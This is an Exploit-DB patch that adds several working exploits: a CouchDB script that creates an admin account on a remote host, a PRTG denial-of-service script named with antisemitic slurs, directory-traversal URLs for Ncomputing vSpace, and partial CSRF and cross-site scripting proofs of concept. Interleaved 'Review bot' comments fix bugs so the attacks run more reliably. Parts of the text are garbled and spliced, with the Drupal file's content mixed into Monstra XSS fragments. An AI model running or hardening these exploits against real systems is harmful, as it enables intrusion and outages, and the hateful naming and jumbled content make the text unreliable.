From 082f2d1bd89052cc0523547c2912106e662ad79d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 24 Apr 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-04-24

6 changes to exploits/shellcodes

PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)
phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC
Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
Monstra cms 3.0.4 - Persitent Cross-Site Scripting
---
exploits/linux/webapps/44498.py | 66 ++++++++++++++++++++++++
exploits/php/webapps/44496.html | 24 +++++++++
exploits/php/webapps/44501.txt | 23 +++++++++
exploits/php/webapps/44502.txt | 28 +++++++++++
exploits/windows/webapps/44497.txt | 37 ++++++++++++++
exploits/windows_x86/dos/44500.py | 80 ++++++++++++++++++++++++++++++
files_exploits.csv | 6 +++
7 files changed, 264 insertions(+)
create mode 100755 exploits/linux/webapps/44498.py
create mode 100644 exploits/php/webapps/44496.html
create mode 100644 exploits/php/webapps/44501.txt
create mode 100644 exploits/php/webapps/44502.txt
create mode 100644 exploits/windows/webapps/44497.txt
create mode 100755 exploits/windows_x86/dos/44500.py

diff --git a/exploits/linux/webapps/44498.py b/exploits/linux/webapps/44498.py
new file mode 100755
index 000000000..cc1a318c3
--- /dev/null
+++ b/exploits/linux/webapps/44498.py
@@ -0,0 +1,66 @@
+# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
+# Date: 2017-08-07
+# Exploit Author: Sebastián Castro @r4wd3r
+# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
+# Software Link: http://couchdb.apache.org/
+# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
+# CVE : CVE-2017-12635
+
+#!/usr/bin/env python
+
+import argparse
+import re
+import sys
+import requests
+
+parser = argparse.ArgumentParser(
+ description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
+ ' (CVE-2017-12635)')
+parser.add_argument('host', help='Host to attack.', type=str)
+parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
+parser.add_argument('-u', '--user', help='Username to create as admin.',
+ type=str, default='couchara')
+parser.add_argument('-P', '--password', help='Password of the created user.',
+ type=str, default='couchapass')
+args = parser.parse_args()
+
+host = args.host
+port = args.port
+user = args.user
+password = args.password
+
+pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
+if not pat_ip.match(host):
+ print "[x] Wrong host. Must be a valid IP address."
+ sys.exit(1)
+
+print "[+] User to create: " + user
+print "[+] Password: " + password
+print "[+] Attacking host " + host + " on port " + port
+
+url = 'http://' + host + ':' + port
+
+try:
+ rtest = requests.get(url, timeout=10)
+except requests.exceptions.Timeout:
+ print "[x] Server is taking too long to answer. Exiting."
+ sys.exit(1)
+except requests.ConnectionError:
+ print "[x] Unable to connect to the remote host."
+ sys.exit(1) + +# Payload for creating user +cu_url_payload = url + "/_users/org.couchdb.user:" + user +cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}' + +try: + rcu = requests.put(cu_url_payload, data=cu_data_payload) +except requests.exceptions.HTTPError: + print "[x] ERROR: Unable to create the user on remote host." + sys.exit(1) + +if rcu.status_code == 201: + print "[+] User " + user + " with password " + password + "successfully created." + sys.exit(0) +else: + print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host." \ No newline at end of file diff --git a/exploits/php/webapps/44496.html b/exploits/php/webapps/44496.html new file mode 100644 index 000000000..e6f689940 --- /dev/null +++ b/exploits/php/webapps/44496.html @@ -0,0 +1,24 @@ +# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery +# Date: 2018-04-20 +# Software Link: https://www.phpmyadmin.net/ +# Author: @revengsh & @0x00FI +# CVE: CVE-2018-10188 +# Category: Webapps + + +#1. Description +#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request. +#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user. +#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database. + + + + + + Drop database + + + + +#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer. +#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188 \ No newline at end of file diff --git a/exploits/php/webapps/44501.txt b/exploits/php/webapps/44501.txt new file mode 100644 index 000000000..70c8b3ee5 --- /dev/null +++ b/exploits/php/webapps/44501.txt 
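Review bot: The failure branch at the end of the hunk, `print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."`, concatenates a str with the int status code and raises TypeError, so any non-201 answer (an already-existing user, an auth-protected `_users` database) crashes the script instead of reporting; use `print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."`. The `except requests.exceptions.HTTPError` around `requests.put` never fires, since `put` only raises HTTPError after `raise_for_status()`; catching `requests.ConnectionError` there, as the earlier probe already does, covers the realistic failure. The `#!/usr/bin/env python` line sits after the header comments rather than on line 1, so despite the 100755 mode the file will not run as Python when executed directly. The duplicated `"roles"` key in `cu_data_payload` is the CVE-2017-12635 trigger itself and must remain a hand-built string, which deserves a one-line comment such as `# duplicate "roles" key on purpose: Erlang and JS parsers keep different copies (CVE-2017-12635)` so nobody "fixes" it with json.dumps. The success message also lacks a space before `successfully`.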
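Review bot: Between the `#2. Proof of Concept` line and the `Drop database` text no request target is visible; the crafted `sql.php` GET request the description promises appears to have been lost (probably stripped markup), so the PoC as shown cannot be reproduced or verified. The advisory should state the exact URL and query parameters in a plain comment line that survives without markup, next to the link or form that carries them. It would also help to name the precondition the CSRF relies on (an authenticated phpMyAdmin session in the victim's browser), which the description only implies.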
@@ -0,0 +1,23 @@ +#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure +#Author: Larry W. Cashdollar +#Date: 2018-03-30 +#CVE-ID: CVE-2018-9205 +#Download Site: https://www.drupal.org/project/avatar_uploader +#Vendor: https://www.drupal.org/u/robbinzhao +#Vendor Notified: 2018-04-02 +#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146 +#Advisory: http://www.vapidlabs.com/advisory.php?v=202 + +#Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others. +#Vulnerability: +#The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory: + +alert(document.cookie) +#5. visit http:///monstra/blog/.php, you will triage JavaScript execution + + + +#Exploit Code: + +or + \ No newline at end of file diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt new file mode 100644 index 000000000..df89b19d3 --- /dev/null +++ b/exploits/windows/webapps/44497.txt 
@@ -0,0 +1,37 @@
+# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
+# Date: 2018-04-20
+# Software Vendor: NComputing
+# Software Link:
+# Author: Javier Bernardo
+# CVE: CVE-2018-10201
+# Category: Webapps
+
+#[Description]
+#
+#It is possible to read arbitrary files outside the root directory of
+#the web server. This vulnerability could be exploited remotely by a
+#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
+#directory-traversal pattern to TCP port 8667.
+#
+#An attacker can make use of this vulnerability to step out of the root
+#directory and access other parts of the file system. This might give
+#the attacker the ability to view restricted files, which could provide
+#the attacker with more information required to further compromise the system.
+
+#[PoC]
+
+nmap -p T:8667 -Pn your_vSpace_server
+
+Nmap scan report for your_vSpace_server (x.x.x.x)
+Host is up (0.044s latency).
+
+PORT STATE SERVICE
+8667/tcp open unknown
+
+http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
+
+http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
+
+http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
+
+http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/44500.py b/exploits/windows_x86/dos/44500.py
new file mode 100755
index 000000000..a4463456e
--- /dev/null
+++ b/exploits/windows_x86/dos/44500.py
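Review bot: The PoC lists four traversal URLs but never says what a successful response looks like, so a tester cannot tell a vulnerable host from a 404 or an empty page; add a line such as `# Expected: response body is the contents of C:\Windows\win.ini (presumably the [fonts]/[extensions] sections)`. The description's `…/` and `….\` patterns appear to be a mis-rendering of the three- and four-dot sequences actually used in the URLs below, so spelling them out as `.../`, `...\`, `..../`, `....\` removes the ambiguity. The nmap step only shows that port 8667 is open and does not exercise the vulnerability, which the PoC should state so nobody reads an open port as a positive result. The `# Software Link:` header is left empty.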
@@ -0,0 +1,80 @@
+# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
+# Date: 2018-04-21
+# Exploit Author: Lucas "luriel" Carmo
+# Vendor Homepage: https://www.paessler.com/prtg
+# Software Link: https://www.paessler.com/download/prtg-download
+# Version: 18.1.39.1648
+# CVE : CVE-2018-10253
+# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
+# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
+
+#!/usr/bin/python
+
+import requests
+import sys
+import os
+import re
+import socket
+
+green = "\033[1;32m"
+yellow = '\033[1;33m'
+normal = '\033[0;0m'
+banner = """
+ ██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗
+ ██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
+ ██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
+██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
+╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║
+ ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
+"""
+
+
+banner2 = """
+ Author: @Lucas "luriel" Carmo
+"""
+
+os.system('clear')
+
+print(green+banner)
+print(yellow+banner2)
+print(normal)
+
+def check_http(url):
+ pattern = re.compile("http://")
+ return re.search(pattern, url)
+
+def sanitize_url(url):
+ if(not check_http(url)):
+ return "http://" + url
+ return url
+
+def check_server(url):
+ r = requests.get(url, timeout=4)
+ code = r.status_code
+
+def send_jewish_payload(url):
+ payload = {'file':'addmap.htm'}
+ r = requests.post(url, params=payload)
+
+def main():
+ try:
+ if len(sys.argv) <= 3 and len (sys.argv) >= 2:
+ try:
+ url = sanitize_url(sys.argv[1])
+ print(' [#] LOADING!')
+ if (check_server(url) != 404):
+ send_jewish_payload(url)
+ else:
+ print(' [!] Server shutdown or not found')
+ except requests.exceptions.ConnectionError:
+ print(' [~] BOOOOOM! PRTG Server has been exploded!')
+ except requests.exceptions.InvalidURL:
+ print(' [!] Invalid URL')
+ except requests.exceptions.Timeout:
+ print(' [!] Connection Timeout\n')
+ else:
+ print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
+ except KeyboardInterrupt:
+ print(' [!] Jewish Napalm Canceled;.....[./]')
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8446b9183..fc31b6a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5941,6 +5941,7 @@ id,file,description,date,author,type,platform,port
 44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
 44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
 44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
+44500,exploits/windows_x86/dos/44500.py,"PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)",2018-04-23,luriel,dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
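Review bot: `check_server` never returns a value, so `if (check_server(url) != 404)` in `main` compares `None != 404` and is always true — the payload is sent regardless of what the probe saw and the `else` branch printing "Server shutdown or not found" is dead; end the function with `return r.status_code` (the `code` local is assigned and never used). `send_jewish_payload` posts without a `timeout`, so a target that accepts the connection and never answers hangs the script indefinitely and never reaches the ConnectionError handler that is used as the success signal; pass `timeout=4` as `check_server` does. Treating any ConnectionError as "server exploded" also misreports ordinary network failures, so the message should be hedged or followed by a second probe of the service. `socket` is imported and never used, and `os.system('clear')` will print an error on Windows hosts running the script.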
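Review bot: The new 44500 row describes the affected range as `PRTG Network Monitor < 18.1.39.1648`, while the exploit header added in 44500.py states `Version: 18.1.39.1648` with no range, so the index and the exploit disagree on whether 18.1.39.1648 itself is vulnerable; one of the two should be corrected against the vendor advisory for CVE-2018-10253.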
@@ -39188,3 +39189,8 @@ id,file,description,date,author,type,platform,port
 44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
 44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
 44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php,
+44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php,
+44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC",2018-04-23,"Javier Bernardo",webapps,windows,
+44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
+44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
+44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,
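Review bot: The 44502 row misspells the vulnerability class as `Persitent`; the description should read `"Monstra cms 3.0.4 - Persistent Cross-Site Scripting"` (the commit subject carries the same typo). The 44498 row also drops the `JSON` qualifier that the exploit's own header uses (`Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1`), so searching the index by the title in the file will not match.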